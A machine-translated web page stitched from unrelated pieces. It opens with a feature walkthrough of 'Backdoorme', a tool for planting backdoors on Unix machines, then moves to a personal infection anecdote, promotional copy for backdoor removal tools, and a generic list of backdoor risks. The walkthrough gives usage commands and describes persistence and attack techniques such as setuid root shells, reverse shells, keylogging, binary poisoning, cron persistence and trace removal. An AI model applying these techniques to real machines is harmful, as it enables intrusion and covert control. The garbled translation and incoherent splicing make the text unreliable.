Backdoor download the program. A hacker's backdoor into your PC is BackDoor spyware. Backdoor infection method

Backdoorme - utility for automatic creation of backdoors

Backdoorme is a powerful utility capable of creating many backdoors on Unix machines. Backdoorme uses the familiar metasploit interface with amazing extensibility. Backdoorme relies on ownership of an existing SSH connection or victim credentials through which they can pass and host any loophole. Please use Backdoorme with open permission.

Hidden from guests

A little more about backdoors: To run backdoorme, make sure you have the required dependencies.

$ python dependencies.py

Running backdoorme:

$ pythonmaster.py

To use the backdoor, simply run the "use" keyword.

>> use shell/metasploit + Using current target 1. + Using Metasploit backdoor... (msf) >>

From there you can set options appropriate for the backdoor. Run either "show options" or "help" to view a list of options that can be configured.

Like metasploit, backdoors are organized by category.

• Auxiliary (Auxiliary categories)
  • keylogger– Adds a keylogger to the system and makes it possible for you to send the results back by mail;
  • simplehttp- Installs the python SimpleHTTP server on the client.
  • user– Adds a new user to the target.
  • web– Installs Apache Server on the client.
• Escalation (Extension category)
  • setuid- The SetUID backdoor works by setting a setuid bit on the executable, assuming the user has root access. Thus, when that executable is later run by a user without root access, that executable is executed with root access. By default, this backdoor switches the setuid bit to nano, such that if root access is lost in any way, an attacker can SSH back in as a non-privileged user and still be able to run nano (or any binary of choice) as root. ("nano /etc/shadow"). Please note that in order to deploy this backdoor extension, root access is required at the very beginning.
  • shell– shell backdoor is a privileged backdoor extension similar to (but more specific) its SetUID sibling extension. It duplicates the bash shell into a hidden binary and sets the SUID bit. Note that deploying this backdoor extension initially requires root access. To use this backdoor if SSH is running as an unprivileged user, simply run ".bash -p" and you will have root access.
• Shell (Shell category)
  • bash- uses a simple bash script to connect to a specific ip and port combination and pass the result to bash.
  • bash2 is a slightly different (and more secure) backdoor to the bash described above, which does not require a password from the client side.
  • metasploit- uses msfvenom to generate a reverse_tcp binary on the target, then runs the binary to connect to the meterpreter shell.
  • netcat- uses netcat to pass standard input and output to /bin/sh, giving the user an interactive shell.
  • netcat_traditional- uses netcat-traditional "s -e to create a reverse shell.
  • perl is a script written in perl that redirects the result to bash and renames the process to look less conspicuous.
  • php- runs a php backdoor that sends the result to bash. It does not automatically install a web server, but uses a web module instead.
  • pupy- uses the n1nj4sec Pupy backdoor, which is located on

    Hidden from guests

    .
  • python- uses a short python script to execute commands and send the results back to the user.
  • web- sends a web server to the target, then loads the msfvenom php reverse_tcp backdoor and connects to the host. Although it is still a php backdoor, it is not the same as the php backdoor described above.
• Access (Access category)
  • remove_ssh- removes the ssh server on the client. Very handy to use at the end of a backdoor session to remove any traces.
  • ssh_key- creates an RSA key and copies it to the target to connect without a ssh password.
  • ssh_port- Adds a new port for ssh.
• Windows (Windows category)
  • windows- Uses msfvenom to create a windows backdoor.

Each backdoor has the ability to obtain additional modules that are used to make the backdoor more powerful. To add a module, simply use the "add" keyword.

(msf) >> add poison + Poison module added

Each module has additional options that can be configured and if "help" is run again you can see or set any additional options.

Available on this moment modules include:

• Poison
  • Produce bin poisoning of the target computer - It compiles an executable file to call the system utility and the existing backdoor.
  • For example, if the bin poisoning module is run along with "ls", it will compile and port a binary called "ls" that will run both the existing backdoor and the original "ls", thus disabling the user to run the backdoor more frequently.
• Cron
  • Adds an existing backdoor to the root user's crontab to run at the specified frequency.
• Web
  • Installs a web server and hosts a web page that runs the backdoor.
  • Just visits the site with an open listener and the backdoor is launched.
• user
  • Adds a new user to the target.
• startup
  • Allows you to create backdoors with bashrc and init files.
• Whitelist
  • It whitelists the IP so that only this IP can connect to the backdoor.

Picking someone else's password is not an easy thing, except that its combination is not a banal “qwerty”. And in vain, Internet users who actively use Internet banking curse hackers unknown to them that they stole banknotes from their electronic wallets by selecting password symbols. Everything is much simpler - while wandering around the Runet, robbed users themselves, without knowing it, downloaded a supplement to the files they were interested in, be it music, video, or something else. They downloaded the BackDoor spyware program and that's when it all started...

In my case, acquaintance with backdoors fell on my head, like snow in July. After much deliberation, I decided to leave the dial-up Internet for 3G, having bought a modem and traffic from the beeline. Having returned home with a freshly acquired modem, having installed its software on my computer, I set my sights on frenzied surfing on the Internet - the speed should have exceeded the dialap one at least 50 times. climb unknown programs ... Without paying due attention to the actions of these same programs and turning off the computer until the next day, the next day I discovered that Dr. The web has gone down and does not want to hunt for viruses.

Back door in the PC for a hacker

What kind of animal is this BackDoor and how not to acquire it, how to remove it? "Back door", as translated from English backdoor, is created by a hacker and distributed in programs and files popular among users, according to e-mail(less often) - its code is attributed to them by a hacker-distributor. So we download it on our own and voluntarily! Once in the user's computer, the BackDoor virus registers itself in the root windows folder and in a bunch of other places, blocks the work of the antivirus and constantly sends the owner information about the passwords and accounts of the user of this PC. In addition, this spyware virus actively spreads itself from a computer that it seizes, using any external contact - ICQ, email. mail, mail agent, skype, social media etc. ... Tin, in a word.

What should an ordinary user who is not sophisticated in repelling hacker attacks do? Having found spyware BackDoor visiting on your PC - if you do not have a sensible firewall or antivirus, it will be difficult to detect, only after stealing banknotes and withdrawing accounts - get a specialized antispyware anti-spyware program. For example, I have Ad-Aware SE Personal, albeit with old databases and in free version but still effective. Then beat the asshole backdoor out of the key registry entries with it, quickly reinstall the antivirus and update its databases - set a full scan immediately after the update and wait for it to complete, no matter how long it takes!

Name of the threat

Executable file name:

Threat type:

Affected OS:

Backdoor

??host.exe

Win32 (Windows XP, Windows Vista, Windows Seven, Windows 8)

Backdoor infection method

Backdoor copies its file(s) to your HDD. Typical file name ??host.exe. It then creates an autoload key in the registry with the name Backdoor and meaning ??host.exe. You can also find it in the list of processes named ??host.exe or Backdoor.

If you have additional questions regarding Backdoor, please fill out and we will contact you shortly.

Download Removal Tool

Download this program and remove Backdoor and ??chost.exe (download will start automatically):

* SpyHunter was developed by US-based EnigmaSoftware company and is able to remove Backdoor-related issues in automatic mode. The program has been tested on Windows XP, Windows Vista, Windows 7 and Windows 8.

Functions

The program is able to protect files and settings from malicious code.

The program can fix browser problems and protects browser settings.

Removal is guaranteed - if SpyHunter fails, free support is provided.

24/7 anti-virus support is included in the package.

Download Backdoor Removal Tool from Russian company Security Stronghold

If you are not sure which files to delete, use our program Backdoor Removal Tool.. Backdoor Removal Tool will find and completely remove Backdoor and all the problems associated with the Backdoor virus. Fast, easy-to-use Backdoor Removal Tool will protect your PC from Backdoor threat that harms your computer and violates your privacy. Backdoor Removal Tool scans your hard drives and registry and destroys any manifestation of Backdoor. Regular anti-virus software is powerless against malicious programs such as Backdoor. Download this simplified removal tool specially designed to solve problems with Backdoor and ??chost.exe (download will start automatically):

Functions

Removes all files created by Backdoor.

Removes all registry entries created by Backdoor.

The program can fix problems with the browser.

Immunizes the system.

Removal is guaranteed - if the Utility fails, free support is provided.

24/7 anti-virus support via the GoToAssist system is included in the package.

Let our support team solve your Backdoor problem and remove Backdoor right now!

Leave detailed description of your Backdoor problem in the . Our support team will contact you and provide a step-by-step solution for Backdoor problem. Please describe your problem as precisely as possible. This will help us provide you with the most effective Backdoor removal method.

How to remove Backdoor manually

This problem can be solved manually by deleting registry keys and files related to Backdoor, removing it from startup list and de-registering all related DLLs. In addition, missing DLL files must be restored from the OS distribution if they were damaged. Backdoor.

In order to get rid of Backdoor, You need:

1. End the following processes and delete the corresponding files:

• 011e3ecab24891617792f6cc556c541f.exe
• 02a572cd0e1d2ff8393075b839efcb64.exe
• 04986c5cdcecf53f6bf739c1599a03ce.exe
• 061da56505834b273a475f3827544e17.exe
• 07596ec68058a0eba10bf02b7a88d048.exe
• 07ff265743f71b15cc23bb814557f8e5.exe
• 0ad266c58b49ee7d239b032b4c69e628.exe
• 0c0002d8878bf0f373d352332ae7124f.exe
• 0c573e14354d5b00e91161d3deef0df7.exe
• 0ef88726226d112172058358b80f9b03.exe
• 1427142166.exe
• 146f8b1cc9be67e99e0ccc5ad10acfd2.exe
• 1476552388.exe
• 147bb8297e9cac245b35fc56c826f629.exe
• 1670a7b26eac340d7e177bbb47ddfee0.exe
• 1842849d10ce64dba5a853776610e006.exe
• 1b63703a58b3b17098c080c84a35bd85.exe
• 442804435.exe
• 959296333.exe
• backdoor.af.exe
• backdoor.c
• backdoor.haw.exe
• backdoor.mdm.exe
• backdoor.nb.exe
• backdoor.pld.exe
• backdoor.raw.exe
• backdoor.rdr.exe
• backdoor.tms.exe
• backdoor.txt
• backdoor.vb.ga.exe
• backdoor.xel.exe
• backdoor.zkt.exe
• b_login.exe
• ftpip.exe
• icqnuke.exe
• manual.info
• ppupdater.exe
• readme.exe
• runtime.txt
• showall.exe
• xxx.exe
• zemac.a.exe
• notpa.exe

A warning: you need to delete only files whose checksums are in the list of malicious ones. Your system may have the necessary files with the same names. We recommend using for a safe solution to the problem.

2. Delete the following folders:

3. Delete the following registry keys and/or values:

A warning: If registry key values ​​are provided, you must remove only the specified values ​​and leave the keys themselves intact. We recommend using for a safe solution to the problem.

4. Reset browser settings

Backdoor can sometimes affect your browser settings, such as changing the search and home page. We recommend that you use the free "Reset Browsers" feature in "Tools" in the program to reset all browsers at once. Please note that before doing this you need to delete all files, folders and registry keys belonging to Backdoor. To reset browser settings manually, use this instruction:

For Internet Explorer

If you are using Windows XP, click Start, and Open. Enter the following in the field Open without quotes and click Enter: "inetcpl.cpl".

If you are using Windows 7 or Windows Vista, click Start. Enter the following in the field Search without quotes and click Enter: "inetcpl.cpl".

Select tab Additionally

Under Reset Internet Explorer browser settings, click Reset. And press Reset again in the window that opens.

Select checkbox Delete personal settings to delete history, restore search and home page.

After Internet Explorer has finished resetting, click close in the dialog box.

A warning: Reset browser settings in Tools

For Google Chrome

Find the Google Chrome installation folder at: C:\Users\"username"\AppData\Local\Google\Chrome\Application\User Data.

In the folder User Data, find the file Default and rename it to Default Backup.

Launch Google Chrome and a new file will be created Default.

Google Chrome settings reset

A warning: In case that doesn't work, use the free option. Reset browser settings in Tools in Stronghold AntiMalware.

For Mozilla Firefox

Open Firefox

Select from the menu Help > Troubleshooting Information.

click button Reset Firefox.

After Firefox finishes, it will show a window and create a folder on the desktop. Click Complete.

A warning: This is how you lose your passwords! We recommend using the free option Reset browser settings in Tools in Stronghold AntiMalware.

Generally speaking, backdoors are specific trojans, viruses, keyloggers, spyware, and remote administration tools. They work in the same way as the mentioned virus applications do. However, their functions and loads are more complex and dangerous, therefore, they are grouped into one special category.

How are backdoors distributed?

What risks can be initiated by this computer infection?

When the backdoor finds a path to the system, it invokes the following actions:

• Allows an intruder to create, delete, rename, copy or edit any file, execute various commands, change any system settings, change the Windows registry, launch, control and eliminate applications, install other software.
• Allows a hacker to control the computer's hardware devices, change settings related to shutting down or restarting the computer without permission.
• Steals personal information, valuable documents, passwords, logins, identity data, user activity logs and tracks web browsing habits.
• Records button presses and takes screenshots. In addition, it sends the collected data to specific email addresses, uploads it to a given FTP server, or transmits it over an Internet connection to remote hosts.
• Infects files installed applications and damage the entire system.
• Distributes infected files to remote computers with some security vulnerabilities, performs attacks against hackers on remote hosts.
• Installs a hidden FTP server that can be used by intruders for various illegal purposes.